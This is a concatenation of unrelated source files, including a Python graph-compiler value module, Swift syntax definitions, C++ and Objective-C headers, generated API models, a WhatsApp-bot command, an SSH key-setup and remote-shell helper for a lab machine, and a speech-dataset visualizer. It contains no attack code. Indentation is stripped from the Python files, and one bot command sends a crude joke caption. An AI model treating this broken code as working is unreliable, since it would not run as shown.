def apply_to_object(self, obj: 'Object'):
        apply_predefined_value_assigners(type(DictValue), obj)
'''
keys_func = Object(
FuncValue(functions_builtin.KeysFunction(self), obj, None))
obj.attributes.get_attribute('keys').revise(keys_func)
values_func = Object(
FuncValue(functions_builtin.ValuesFunction(self), obj, None))
obj.attributes.get_attribute('values').revise(values_func)
'''
def __str__(self):
return self.name + '(D)'
class TensorValue(Value):
def __init__(self, value = None):
super().__init__()
self.shape = ()
self.internal_value = value
self.value = None # not used?
self.dtype = None
if self.internal_value is not None:
self.dtype = np.array(self.internal_value).dtype
if not config.float_restrict and self.dtype == np.float64:
self.dtype = np.float32
def is_not_none_or_any_value(self):
return True
def is_iteratable(self):
return True
def get_iterator(self) -> 'Object':
v = TensorValue()
v.dtype = self.dtype
return Object(v)
def apply_to_object(self, obj: 'Object'):
apply_predefined_value_assigners(type(TensorValue), obj)
def __str__(self):
return self.name + '(T.{})'.format(self.shape)
class Type(Value):
def __init__(self, name: 'str'):
super().__init__()
self.name = name
def is_not_none_or_any_value(self):
return True
class ModuleValue(Value):
def __init__(self, module):
super().__init__()
self.internal_module = module
def try_get_obj(self, name: 'str', inst: 'Object', root_graph : 'graphs.Graph') -> 'Object':
if self.internal_module == six.moves:
            # Calling `inspect.getmembers` for `six.moves` causes an
            # eager load of potentially non-existent libraries such
            # as tkinter or gdbm. To work around this issue, we
            # retrieve only whitelisted members of `six.moves`.
# TODO(hamaji): Figure out a better workaround.
safe_keys = ['range', 'xrange', 'map', 'filter', 'zip']
members = [(k, getattr(self.internal_module, k)) for k in safe_keys]
else:
members = inspect.getmembers(self.internal_module)
members_dict = {}
for member in members:
members_dict[member[0]] = member[1]
if not (name in members_dict.keys()):
if name in builtin_function_converters.keys():
v = Object(builtin_function_converters[name])
return v
return None
attr_v = members_dict[name]
dummy_flags_members_dict = {}
dummy_flags_members = inspect.getmembers(flags)
for member in dummy_flags_members:
if isinstance(member[1], types.FunctionType):
dummy_flags_members_dict[member[0]] = member[1]
if name in dummy_flags_members_dict.keys():
v = Object(builtin_function_converters[name])
return v
v = parse_instance(inst, name, attr_v, None)
return v
class Instance(Value):
def __init__(self, module: 'Object', inst, classinfo):
super().__init__()
self.inst = inst
self.func = None
self.module = module
self.classinfo = classinfo
def is_not_none_or_any_value(self):
return True
class UserDefinedInstance(Instance):
def __init__(self, module: 'Object', inst, classinfo):
super().__init__(module, inst, classinfo)
def try_get_obj(self, name: 'str', inst: 'Object', root_graph : 'graphs.Graph') -> 'Object':
obj = None
if self.inst is not None:
if not hasattr(self.inst, name):
return None
attr_v = getattr(self.inst, name)
obj = parse_instance(self.module, name, attr_v, inst, root_graph=root_graph)
else:
members = inspect.getmembers(self.classinfo)
members_dict = {}
for member in members:
members_dict[member[0]] = member[1]
if not (name in members_dict.keys()):
return None
obj = parse_instance(self.module, name, members_dict[name], inst, from_member=True, root_graph=root_graph)
return obj
def apply_to_object(self, obj: 'values.Object'):
super().apply_to_object(obj)
enter_func = obj.try_get_and_store_obj('__enter__', None)
if enter_func is not None:
obj.get_field().get_attribute('__enter__').revise(enter_func)
exit_func = obj.try_get_and_store_obj('__exit__', None)
if exit_func is not None:
obj.get_field().get_attribute('__exit__').revise(exit_func)
getitem_func = obj.try_get_and_store_obj('__getitem__', None)
if getitem_func is not None:
obj.get_field().get_attribute('__getitem__').revise(getitem_func)
|
import wgPatentCheck from './wgPatent'
import syPatentCheck from './syPatent'
import inventPatentCheck from './inventPatent'
export default {
wgPatentCheck,
syPatentCheck,
inventPatentCheck
}
|
/*
Copyright (c) 2003-2015, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
CKEDITOR.plugins.setLang("placeholder","eu",{title:"Leku-marka Aukerak",toolbar:"Leku-marka sortu",name:"Placeholder Name",invalidName:"The placeholder can not be empty and can not contain any of following characters: [, ], <, >",pathName:"placeholder"});
|
/*
* SeminarCatalog API
* Rest API for SeminarCatalog Administration
*
* OpenAPI spec version: 1.0.0
* Contact: info@databay.de
*
* NOTE: This class is auto generated by the swagger code generator program.
* https://github.com/swagger-api/swagger-codegen.git
*
* Swagger Codegen version: 2.4.12
*
* Do not edit the class manually.
*/
import {ApiClient} from '../ApiClient';
/**
* The AllocationWaitingList model module.
* @module model/AllocationWaitingList
* @version 1.0.0
*/
export class AllocationWaitingList {
/**
* Constructs a new <code>AllocationWaitingList</code>.
* @alias module:model/AllocationWaitingList
* @class
*/
constructor() {
}
/**
* Constructs a <code>AllocationWaitingList</code> from a plain JavaScript object, optionally creating a new instance.
* Copies all relevant properties from <code>data</code> to <code>obj</code> if supplied or a new instance if not.
* @param {Object} data The plain JavaScript object bearing properties of interest.
* @param {module:model/AllocationWaitingList} obj Optional instance to populate.
* @return {module:model/AllocationWaitingList} The populated <code>AllocationWaitingList</code> instance.
*/
static constructFromObject(data, obj) {
if (data) {
obj = obj || new AllocationWaitingList();
if (data.hasOwnProperty('_syncFields'))
obj.syncFields = ApiClient.convertToType(data['_syncFields'], ['String']);
if (data.hasOwnProperty('id'))
obj.id = ApiClient.convertToType(data['id'], 'Number');
if (data.hasOwnProperty('foreignId'))
obj.foreignId = ApiClient.convertToType(data['foreignId'], 'String');
if (data.hasOwnProperty('language'))
obj.language = ApiClient.convertToType(data['language'], 'Number');
if (data.hasOwnProperty('createDate'))
obj.createDate = ApiClient.convertToType(data['createDate'], 'Number');
if (data.hasOwnProperty('changeDate'))
obj.changeDate = ApiClient.convertToType(data['changeDate'], 'Number');
if (data.hasOwnProperty('deleted'))
obj.deleted = ApiClient.convertToType(data['deleted'], 'Number');
if (data.hasOwnProperty('hidden'))
obj.hidden = ApiClient.convertToType(data['hidden'], 'Number');
if (data.hasOwnProperty('sorting'))
obj.sorting = ApiClient.convertToType(data['sorting'], 'Number');
if (data.hasOwnProperty('tags'))
obj.tags = ApiClient.convertToType(data['tags'], 'String');
}
return obj;
}
}
/**
* @member {Array.<String>} syncFields
*/
AllocationWaitingList.prototype.syncFields = undefined;
/**
* @member {Number} id
*/
AllocationWaitingList.prototype.id = undefined;
/**
* @member {String} foreignId
*/
AllocationWaitingList.prototype.foreignId = undefined;
/**
* @member {Number} language
*/
AllocationWaitingList.prototype.language = undefined;
/**
* @member {Number} createDate
*/
AllocationWaitingList.prototype.createDate = undefined;
/**
* @member {Number} changeDate
*/
AllocationWaitingList.prototype.changeDate = undefined;
/**
* @member {Number} deleted
*/
AllocationWaitingList.prototype.deleted = undefined;
/**
* @member {Number} hidden
*/
AllocationWaitingList.prototype.hidden = undefined;
/**
* @member {Number} sorting
*/
AllocationWaitingList.prototype.sorting = undefined;
/**
* @member {String} tags
*/
AllocationWaitingList.prototype.tags = undefined;
|
from Child import Child
from Node import Node # noqa: I201
PATTERN_NODES = [
# type-annotation -> ':' type
Node('TypeAnnotation', kind='Syntax',
children=[
Child('Colon', kind='ColonToken'),
Child('Type', kind='Type'),
]),
# enum-case-pattern -> type-identifier? '.' identifier tuple-pattern?
Node('EnumCasePattern', kind='Pattern',
children=[
Child('Type', kind='Type',
is_optional=True),
Child('Period', kind='PeriodToken'),
Child('CaseName', kind='IdentifierToken'),
Child('AssociatedTuple', kind='TuplePattern',
is_optional=True),
]),
# is-type-pattern -> 'is' type
Node('IsTypePattern', kind='Pattern',
children=[
Child('IsKeyword', kind='IsToken'),
Child('Type', kind='Type'),
]),
# optional-pattern -> pattern '?'
Node('OptionalPattern', kind='Pattern',
children=[
Child('SubPattern', kind='Pattern'),
Child('QuestionMark', kind='PostfixQuestionMarkToken'),
]),
# identifier-pattern -> identifier
Node('IdentifierPattern', kind='Pattern',
children=[
Child('Identifier', kind='IdentifierToken')
]),
# as-pattern -> pattern 'as' type
Node('AsTypePattern', kind='Pattern',
children=[
Child('Pattern', kind='Pattern'),
Child('AsKeyword', kind='AsToken'),
Child('Type', kind='Type'),
]),
# tuple-pattern -> '(' tuple-pattern-element-list ')'
Node('TuplePattern', kind='Pattern',
children=[
Child('OpenParen', kind='LeftParenToken'),
Child('Elements', kind='TuplePatternElementList'),
Child('CloseParen', kind='RightParenToken'),
]),
# wildcard-pattern -> '_' type-annotation?
Node('WildcardPattern', kind='Pattern',
children=[
Child('Wildcard', kind='WildcardToken'),
Child('TypeAnnotation', kind='TypeAnnotation',
is_optional=True),
]),
# tuple-pattern-element -> identifier? ':' pattern ','?
Node('TuplePatternElement', kind='Syntax',
children=[
Child('LabelName', kind='IdentifierToken',
is_optional=True),
Child('Colon', kind='ColonToken',
is_optional=True),
Child('Pattern', kind='Pattern'),
Child('Comma', kind='CommaToken',
is_optional=True),
]),
# expr-pattern -> expr
Node('ExpressionPattern', kind='Pattern',
children=[
Child('Expression', kind='Expr'),
]),
# tuple-pattern-element-list -> tuple-pattern-element
# tuple-pattern-element-list?
Node('TuplePatternElementList', kind='SyntaxCollection',
element='TuplePatternElement'),
# value-binding-pattern -> 'let' pattern
# | 'var' pattern
Node('ValueBindingPattern', kind='Pattern',
children=[
Child('LetOrVarKeyword', kind='Token',
token_choices=[
'LetToken',
'VarToken',
]),
Child('ValuePattern', kind='Pattern'),
]),
]
|
#ifndef LIGHTGBM_APPLICATION_H_
#define LIGHTGBM_APPLICATION_H_
#include <LightGBM/meta.h>
#include <LightGBM/config.h>
#include <vector>
#include <memory>
namespace LightGBM {
class DatasetLoader;
class Dataset;
class Boosting;
class ObjectiveFunction;
class Metric;
/*!
* \brief The main entrance of LightGBM. This application has two tasks:
*        Train and Predict.
*        The Train task trains a new model.
*        The Predict task predicts the scores of test data using an existing model,
*        and saves the scores to disk.
*/
class Application {
public:
Application(int argc, char** argv);
/*! \brief Destructor */
~Application();
  /*! \brief Call this function to run the application */
inline void Run();
private:
/*! \brief Load parameters from command line and config file*/
void LoadParameters(int argc, char** argv);
/*! \brief Load data, including training data and validation data*/
void LoadData();
/*! \brief Initialization before training*/
void InitTrain();
/*! \brief Main Training logic */
void Train();
/*! \brief Initializations before prediction */
void InitPredict();
/*! \brief Main predicting logic */
void Predict();
/*! \brief Main Convert model logic */
void ConvertModel();
/*! \brief All configs */
OverallConfig config_;
/*! \brief Training data */
std::unique_ptr<Dataset> train_data_;
/*! \brief Validation data */
std::vector<std::unique_ptr<Dataset>> valid_datas_;
/*! \brief Metric for training data */
std::vector<std::unique_ptr<Metric>> train_metric_;
/*! \brief Metrics for validation data */
std::vector<std::vector<std::unique_ptr<Metric>>> valid_metrics_;
/*! \brief Boosting object */
std::unique_ptr<Boosting> boosting_;
/*! \brief Training objective function */
std::unique_ptr<ObjectiveFunction> objective_fun_;
};
inline void Application::Run() {
if (config_.task_type == TaskType::kPredict) {
InitPredict();
Predict();
} else if (config_.task_type == TaskType::kConvertModel) {
ConvertModel();
} else {
InitTrain();
Train();
}
}
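// Usage sketch (an assumption for illustration, not part of this header): a typical
// entry point constructs an Application from the command-line arguments and calls
// Run(), which dispatches to training, prediction, or model conversion depending on
// the configured task type:
//
//   int main(int argc, char** argv) {
//     LightGBM::Application app(argc, argv);
//     app.Run();
//     return 0;
//   }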
} // namespace LightGBM
#endif  // LIGHTGBM_APPLICATION_H_
|
/*
* Copyright (c) 2018 Apple Inc. All rights reserved.
*/
#ifndef __OSLOG_ENTRY_LOG_H__
#define __OSLOG_ENTRY_LOG_H__
#ifndef __INDIRECT_OSLOG_HEADER_USER__
#error "Please use <OSLog/OSLog.h> instead of directly using this file."
#endif
NS_ASSUME_NONNULL_BEGIN
/*!
* @enum OSLogEntryLogLevel
*
* @abstract
* The level that this entry was generated at.
*/
typedef NS_ENUM(NSInteger, OSLogEntryLogLevel) {
OSLogEntryLogLevelUndefined,
OSLogEntryLogLevelDebug,
OSLogEntryLogLevelInfo,
OSLogEntryLogLevelNotice,
OSLogEntryLogLevelError,
OSLogEntryLogLevelFault,
}
API_AVAILABLE(macos(10.15)) API_UNAVAILABLE(ios, tvos, watchos)
NS_SWIFT_NAME(OSLogEntryLog.Level);
/*!
* @class OSLogEntryLog
*
* @abstract
* Entries made by the os_log API.
*/
API_AVAILABLE(macos(10.15)) API_UNAVAILABLE(ios, tvos, watchos)
OS_EXPORT
@interface OSLogEntryLog : OSLogEntry <OSLogEntryFromProcess, OSLogEntryWithPayload>
/*!
* @property level
*
* @abstract
* The level of the entry, e.g., info, debug.
*/
@property (nonatomic, readonly) OSLogEntryLogLevel level;
@end
NS_ASSUME_NONNULL_END
#endif /* __OSLOG_ENTRY_LOG_H__ */
|
//***************************************************************************
//
// Copyright (c) 2001 - 2006 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
//***************************************************************************
// CIFXDeviceTextureOGL.h
#ifndef CIFX_Device_TEXTUREOGL_H
#define CIFX_Device_TEXTUREOGL_H
#include "CIFXDeviceTexture.h"
#include "CIFXRenderDeviceOGL.h"
//==============================
// CIFXDeviceTextureOGL
//==============================
class CIFXDeviceTextureOGL : public CIFXDeviceTexture
{
U32 m_refCount;
public:
U32 IFXAPI AddRef ();
U32 IFXAPI Release ();
IFXRESULT IFXAPI QueryInterface (IFXREFIID interfaceId, void** ppInterface);
friend IFXRESULT IFXAPI_CALLTYPE CIFXDeviceTextureOGLFactory(IFXREFIID intId, void** ppUnk);
//====================================
// CIFXDeviceTextureOGL methods
//====================================
IFXRESULT IFXAPI Initialize(IFXOpenGL* pOGL, CIFXRenderDeviceOGL& rDevice);
static void IFXAPI DeleteSurfaceCache();
GLuint Id() { return m_uTexId; }
IFXenum IFXAPI GetType() const { return m_eType; }
protected:
CIFXDeviceTextureOGL();
virtual ~CIFXDeviceTextureOGL();
virtual IFXRESULT IFXAPI SetHWType(IFXenum eType);
virtual IFXRESULT IFXAPI SetHWRenderFormat(IFXenum eFormat);
virtual IFXRESULT IFXAPI SetHWWidth(U32 uWidth);
virtual IFXRESULT IFXAPI SetHWHeight(U32 uHeight);
virtual IFXRESULT IFXAPI SetHWDepth(U32 uDepth);
virtual IFXRESULT IFXAPI SetHWMaxMipLevel(U32 uMipLevel);
virtual IFXRESULT IFXAPI SetHWMinFilter(IFXenum eFilter);
virtual IFXRESULT IFXAPI SetHWMagFilter(IFXenum eFilter);
virtual IFXRESULT IFXAPI SetHWMipMode(IFXenum eMode);
	virtual IFXRESULT IFXAPI SetHWDynamic(BOOL bDynamic);
virtual IFXRESULT IFXAPI SetHWTexture();
virtual IFXRESULT IFXAPI Lock( IFXenum eType,
U32 uMipLevel,
STextureOutputInfo& rTex );
virtual IFXRESULT IFXAPI Unlock(IFXenum eType,
U32 uMipLevel,
STextureOutputInfo& rTex );
void IFXAPI InitData();
IFXRESULT IFXAPI Construct();
GLenum IFXAPI GetGLTextureType(IFXenum eType, GLenum* glBinding = 0);
GLenum m_eGLType;
GLenum m_eGLBindingType;
GLuint m_uTexId;
static U8* ms_pSurface;
static U32 ms_uSurfaceSize;
IFXOpenGL* m_pOGL;
CIFXRenderDeviceOGLPtr m_spDevice;
};
typedef IFXSmartPtr<CIFXDeviceTextureOGL> CIFXDeviceTextureOGLPtr;
#endif // CIFX_Device_TEXTUREOGL_H
// END OF FILE
|
const uploadImage = require('../lib/uploadImage')
let handler = async (m, { conn, text }) => {
let teks = text ? text : m.quoted && m.quoted.text ? m.quoted.text : m.text
await conn.sendFile(m.chat, global.API('xteam', '/videomaker/colorful', { text: teks }, 'APIKEY'), 'colorful.mp4', "fatur gay", m)
}
handler.help = ['colorful'].map((v) => v + " <text>")
handler.tags = ['videomaker', 'update']
handler.command = /^colorful$/i
module.exports = handler
|
# Core modules - Developers only
import os
import subprocess
import fabric
import sys
sys.path.insert(1, '../cui')
import i18n
i18n.load_path.append('./locales/')
i18n.set('filename_format', '{namespace}.{format}')
# Local modules - Developers only
import tasks.logr as LOG
import tasks.dev as DEV
import tasks.config as CONFIG
# Functions - Developers only
def setup_sshkey():
# Creates SSH key locally
copy_sshkey_command = "ssh-copy-id -p '" + str(DEV.vlab_port) + "' -i '" + str(DEV.ssh_path) \
+ str(DEV.vlab_ssh_key) + ".pub' '" + str(DEV.vlab_ssh_user) + "@" + str(DEV.vlab_ip) + "'"
if DEV.vlab_ssh_keypass:
setup_sshkey_command = "ssh-keygen -q -t rsa -b 2048 -N '" + str(DEV.vlab_ssh_keypass) + "' -C '" + str(DEV.vlab_ssh_user) + "@" \
+ str(DEV.computer_name) + "' -f '" + str(DEV.ssh_path) + str(DEV.vlab_ssh_key) \
+ "' && " + copy_sshkey_command
else:
setup_sshkey_command = "ssh-keygen -q -t rsa -b 2048 -N '' -C '" + str(DEV.vlab_ssh_user) + "@" \
+ str(DEV.computer_name) + "' -f '" + str(DEV.ssh_path) + str(DEV.vlab_ssh_key) \
+ "' && " + copy_sshkey_command
if os.path.isfile(str(DEV.ssh_path) + str(DEV.vlab_ssh_key)):
LOG.write(i18n.t('log.ssh.sshkey_exists').format(DEV.ssh_path + str(DEV.vlab_ssh_key)))
subprocess.call(['tmux', 'new', '-s', 'sshkey_copy', copy_sshkey_command])
LOG.write(i18n.t('log.ssh.sshkey_setup_done').format(str(DEV.vlab_ssh_key), str(DEV.vlab_ip)))
else:
LOG.write(i18n.t('log.ssh.sshkey_createcopy').format(str(DEV.vlab_ssh_key), str(DEV.vlab_ip)))
subprocess.call(['tmux', 'new','-s', 'sshkey_setup', setup_sshkey_command])
LOG.write(i18n.t('log.ssh.sshkey_setup_done').format(str(DEV.vlab_ssh_key), str(DEV.vlab_ip)))
def test_ssh_pass():
# Test SSH connection with password
pass_status = ''
with fabric.Connection(host=str(DEV.vlab_ip),
user=str(DEV.vlab_ssh_user), port=str(DEV.vlab_port),
connect_kwargs={"password": str(CONFIG.get_configkey('vlab_ssh_sudopass'))
}) as passc:
try:
pass_connected = passc.run('whoami', hide=True)
if pass_connected.return_code == 0:
LOG.write(i18n.t('log.ssh.ssh_test_password_ok'))
pass_status = str(i18n.t('coreset.popup.testssh_ok'))
else:
LOG.write(i18n.t('log.ssh.ssh_test_password_non'))
pass_status = str(i18n.t('coreset.popup.testssh_non'))
except:
LOG.write(i18n.t('log.ssh.ssh_test_password_non'))
pass_status = str(i18n.t('coreset.popup.testssh_non'))
return pass_status
def test_ssh_pkey():
# Test SSH connection with key
pubkey_status = ''
if not os.path.isfile(str(DEV.ssh_path) + str(DEV.vlab_ssh_key)):
LOG.write(i18n.t('log.ssh.ssh_test_pubkey_non'))
pubkey_status = str(i18n.t('coreset.popup.testssh_non'))
else:
with fabric.Connection(host=str(DEV.vlab_ip),
user=str(DEV.vlab_ssh_user), port=str(DEV.vlab_port),
connect_kwargs={"key_filename": str(DEV.ssh_path) + str(DEV.vlab_ssh_key),
"passphrase": str(DEV.vlab_ssh_keypass)
}) as keyc:
try:
key_connected = keyc.run('whoami', hide=True)
if key_connected.return_code == 0:
LOG.write(i18n.t('log.ssh.ssh_test_pubkey_ok'))
pubkey_status = str(i18n.t('coreset.popup.testssh_ok'))
else:
LOG.write(i18n.t('log.ssh.ssh_test_pubkey_non'))
pubkey_status = str(i18n.t('coreset.popup.testssh_non'))
except:
LOG.write(i18n.t('log.ssh.ssh_test_pubkey_non'))
pubkey_status = str(i18n.t('coreset.popup.testssh_non'))
return pubkey_status
def launch_ssh():
# Launches an SSH shell on the remote machine
with fabric.Connection(host=str(DEV.vlab_ip),
user=str(DEV.vlab_ssh_user), port=str(DEV.vlab_port),
connect_kwargs={"password":
str(CONFIG.get_configkey('vlab_ssh_sudopass')),
"key_filename":
str(DEV.ssh_path) + str(DEV.vlab_ssh_key),
"passphrase":
str(DEV.vlab_ssh_keypass)
}) as ssh_shell:
try:
LOG.write(i18n.t('log.ssh.ssh_launch_ok').format(str(DEV.vlab_ip)))
launch_ssh = ssh_shell.run('exec $SHELL', pty=True)
LOG.write(i18n.t('log.ssh.ssh_launch_close').format(str(DEV.vlab_ip)))
except:
LOG.write(i18n.t('log.ssh.ssh_attemptlaunch_non').format(str(DEV.vlab_ip)))
|
/**
* @license
* Copyright 2018 Google Inc. All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* =============================================================================
*/
import * as speechCommands from '../src';
import {plotSpectrogram} from './ui';
/** Remove the children of a div that do not have the isFixed attribute. */
export function removeNonFixedChildrenFromWordDiv(wordDiv) {
for (let i = wordDiv.children.length - 1; i >=0; --i) {
if (wordDiv.children[i].getAttribute('isFixed') == null) {
wordDiv.removeChild(wordDiv.children[i]);
} else {
break;
}
}
}
/**
* Dataset visualizer that supports
*
* - Display of words and spectrograms
* - Navigation through examples
* - Deletion of examples
*/
export class DatasetViz {
/**
* Constructor of DatasetViz
*
* @param {Object} transferRecognizer An instance of
* `speechCommands.TransferSpeechCommandRecognizer`.
* @param {HTMLDivElement} topLevelContainer The div element that
* holds the div elements for the individual words. It is assumed
* that each element has its "word" attribute set to the word.
* @param {number} minExamplesPerClass Minimum number of examples
* per word class required for the start-transfer-learning button
* to be enabled.
* @param {HTMLButtonElement} startTransferLearnButton The button
* which starts the transfer learning when clicked.
   * @param {HTMLButtonElement} downloadAsFileButton The button
* that triggers downloading of the dataset as a file when clicked.
* @param {number} transferDurationMultiplier Optional duration
* multiplier (the ratio between the length of the example
* and the length expected by the model.) Defaults to 1.
*/
constructor(transferRecognizer,
topLevelContainer,
minExamplesPerClass,
startTransferLearnButton,
downloadAsFileButton,
transferDurationMultiplier = 1) {
this.transferRecognizer = transferRecognizer;
this.container = topLevelContainer;
this.minExamplesPerClass = minExamplesPerClass;
this.startTransferLearnButton = startTransferLearnButton;
this.downloadAsFileButton = downloadAsFileButton;
this.transferDurationMultiplier = transferDurationMultiplier;
// Navigation indices for the words.
this.navIndices = {};
}
/** Get the set of words in the dataset visualizer. */
words_() {
const words = [];
for (const element of this.container.children) {
words.push(element.getAttribute('word'));
}
return words;
}
/**
* Draw an example.
*
* @param {HTMLDivElement} wordDiv The div element for the word. It is assumed
* that it contains the word button as the first child and the canvas as the
* second.
* @param {string} word The word of the example being added.
* @param {SpectrogramData} spectrogram Optional spectrogram data.
* If provided, will use it as is. If not provided, will use WebAudio
* to collect an example.
* @param {string} uid UID of the example being drawn. Must match the UID
* of the example from `this.transferRecognizer`.
*/
async drawExample(wordDiv, word, spectrogram, uid) {
if (uid == null) {
throw new Error('Error: UID is not provided for pre-existing example.');
}
removeNonFixedChildrenFromWordDiv(wordDiv);
// Create the left and right nav buttons.
const leftButton = document.createElement('button');
leftButton.textContent = '←';
wordDiv.appendChild(leftButton);
const rightButton = document.createElement('button');
rightButton.textContent = '→';
wordDiv.appendChild(rightButton);
// Determine the position of the example in the word of the dataset.
const exampleUIDs =
this.transferRecognizer.getExamples(word).map(ex => ex.uid);
const position = exampleUIDs.indexOf(uid);
this.navIndices[word] = exampleUIDs.indexOf(uid);
if (position > 0) {
leftButton.addEventListener('click', () => {
this.redraw(word, exampleUIDs[position - 1]);
});
} else {
leftButton.disabled = true;
}
if (position < exampleUIDs.length - 1) {
rightButton.addEventListener('click', () => {
this.redraw(word, exampleUIDs[position + 1]);
});
} else {
rightButton.disabled = true;
}
// Spectrogram canvas.
const exampleCanvas = document.createElement('canvas');
exampleCanvas.style['display'] = 'inline-block';
exampleCanvas.style['vertical-align'] = 'middle';
exampleCanvas.height = 60;
exampleCanvas.width = 80;
exampleCanvas.style['padding'] = '3px';
wordDiv.appendChild(exampleCanvas);
const modelNumFrames = this.transferRecognizer.modelInputShape()[1];
await plotSpectrogram(
exampleCanvas, spectrogram.data, spectrogram.frameSize,
spectrogram.frameSize, {
pixelsPerFrame: exampleCanvas.width / modelNumFrames,
maxPixelWidth: Math.round(0.4 * window.innerWidth),
markMaxIntensityFrame:
this.transferDurationMultiplier > 1 &&
word !== speechCommands.BACKGROUND_NOISE_TAG
});
// Create Delete button.
const deleteButton = document.createElement('button');
deleteButton.textContent = 'X';
wordDiv.appendChild(deleteButton);
// Callback for delete button.
deleteButton.addEventListener('click', () => {
this.transferRecognizer.removeExample(uid);
// TODO(cais): Smarter logic for which example to draw after deletion.
// Right now it always redraws the last available one.
this.redraw(word);
});
this.updateButtons_();
}
/**
* Redraw the spectrogram and buttons for a word.
*
* @param {string} word The word being redrawn. This must belong to the
* vocabulary currently held by the transferRecognizer.
* @param {string} uid Optional UID for the example to render. If not
* specified, the last available example of the dataset will be drawn.
*/
async redraw(word, uid) {
if (word == null) {
throw new Error('word is not specified');
}
let divIndex;
for (divIndex = 0; divIndex < this.container.children.length; ++divIndex) {
if (this.container.children[divIndex].getAttribute('word') === word) {
break;
}
}
if (divIndex === this.container.children.length) {
throw new Error(`Cannot find div corresponding to word ${word}`);
}
const wordDiv = this.container.children[divIndex];
const exampleCounts = this.transferRecognizer.isDatasetEmpty() ?
{} : this.transferRecognizer.countExamples();
if (word in exampleCounts) {
const examples = this.transferRecognizer.getExamples(word);
let example;
if (uid == null) {
// Example UID is not specified. Draw the last one available.
example = examples[examples.length - 1];
} else {
// Example UID is specified. Find the example and update navigation
// indices.
for (let index = 0; index < examples.length; ++index) {
if (examples[index].uid === uid) {
example = examples[index];
}
}
}
const spectrogram = example.example.spectrogram;
await this.drawExample(wordDiv, word, spectrogram, example.uid);
} else {
removeNonFixedChildrenFromWordDiv(wordDiv);
}
this.updateButtons_();
}
/**
* Redraw the spectrograms and buttons for all words.
*
* For each word, the last available example is rendered.
**/
redrawAll() {
for (const word of this.words_()) {
this.redraw(word);
}
}
/** Update the button states according to the state of transferRecognizer. */
updateButtons_() {
const exampleCounts = this.transferRecognizer.isDatasetEmpty() ?
{} : this.transferRecognizer.countExamples();
const minCountByClass =
this.words_().map(word => exampleCounts[word] || 0)
.reduce((prev, current) => current < prev ? current : prev);
for (const element of this.container.children) {
const word = element.getAttribute('word');
const button = element.children[0];
const displayWord = word ===
speechCommands.BACKGROUND_NOISE_TAG ? 'noise' : word;
const exampleCount = exampleCounts[word] || 0;
if (exampleCount === 0) {
button.textContent = `${displayWord} (${exampleCount})`;
} else {
const pos = this.navIndices[word] + 1;
button.textContent = `${displayWord} (${pos}/${exampleCount})`;
}
}
const requiredMinCountPerClass =
Math.ceil(this.minExamplesPerClass / this.transferDurationMultiplier);
if (minCountByClass >= requiredMinCountPerClass) {
this.startTransferLearnButton.textContent = 'Start transfer learning';
this.startTransferLearnButton.disabled = false;
} else {
this.startTransferLearnButton.textContent =
`Need at least ${requiredMinCountPerClass} examples per word`;
this.startTransferLearnButton.disabled = true;
}
this.downloadAsFileButton.disabled = this.transferRecognizer.isDatasetEmpty();
}
}
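// Usage sketch: the element IDs below are illustrative and it is assumed the transfer
// recognizer comes from the speech-commands API (create()/createTransfer()); adapt to
// the host page.
//
//   const base = speechCommands.create('BROWSER_FFT');
//   await base.ensureModelLoaded();
//   const transferRecognizer = base.createTransfer('my-words');
//   const viz = new DatasetViz(
//       transferRecognizer,
//       document.getElementById('word-divs'),        // one child div per word
//       8,                                           // min examples per class
//       document.getElementById('start-transfer'),
//       document.getElementById('download-dataset'));
//   viz.redrawAll();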
|
// circles
// copyright Artan Sinani
// https://github.com/lugolabs/circles
/*
  Lightweight JavaScript library that generates circular graphs in SVG.
Call Circles.create(options) with the following options:
id - the DOM element that will hold the graph
radius - the radius of the circles
    width - the width of the ring (optional, defaults to 10 if not specified)
value - init value of the circle (optional, defaults to 0)
maxValue - maximum value of the circle (optional, defaults to 100)
text - the text to display at the centre of the graph (optional, the current "htmlified" value will be shown if not specified)
if `null` or an empty string, no text will be displayed
can also be a function: the returned value will be the displayed text
ex1. function(currentValue) {
return '$'+currentValue;
}
ex2. function() {
return this.getPercent() + '%';
}
colors - an array of colors, with the first item coloring the full circle
(optional, it will be `['#EEE', '#F00']` if not specified)
duration - value in ms of animation duration; (optional, defaults to 500);
if 0 or `null` is passed, the animation will not run
wrpClass - class name to apply on the generated element wrapping the whole circle.
    textClass - class name to apply on the generated element wrapping the text content.
API:
    updateRadius(radius) - regenerates the circle with the given radius (see spec/responsive.html for an example of how to create a responsive circle)
updateWidth(width) - regenerates the circle with the given stroke width
updateColors(colors) - change colors used to draw the circle
    update(value, duration) - updates the value of the circle. If value is set to true, forces a redraw with the current value
getPercent() - returns the percentage value of the circle, based on its current value and its max value
getValue() - returns the value of the circle
getMaxValue() - returns the max value of the circle
getValueFromPercent(percentage) - returns the corresponding value of the circle based on its max value and given percentage
    htmlifyNumber(number, integerPartClass, decimalPartClass) - returns the HTML representation of the given number with the given class names applied to the tags
*/
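// Usage sketch (assumes an element with id="circle" exists on the page; all values are
// illustrative):
//
//   var circle = Circles.create({
//     id: 'circle',
//     radius: 60,
//     value: 42,
//     maxValue: 100,
//     width: 8,
//     colors: ['#EEE', '#F00'],
//     duration: 400,
//     text: function(value) { return value + '%'; }
//   });
//   circle.update(75);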
(function(root, factory) {
if(typeof exports === 'object') {
module.exports = factory();
}
else if(typeof define === 'function' && define.amd) {
define([], factory);
}
else {
    root.Circles = factory();
}
}(this, function() {
"use strict";
var requestAnimFrame = window.requestAnimationFrame ||
window.webkitRequestAnimationFrame ||
window.mozRequestAnimationFrame ||
window.oRequestAnimationFrame ||
window.msRequestAnimationFrame ||
function (callback) {
setTimeout(callback, 1000 / 60);
},
Circles = window.Circles = function(options) {
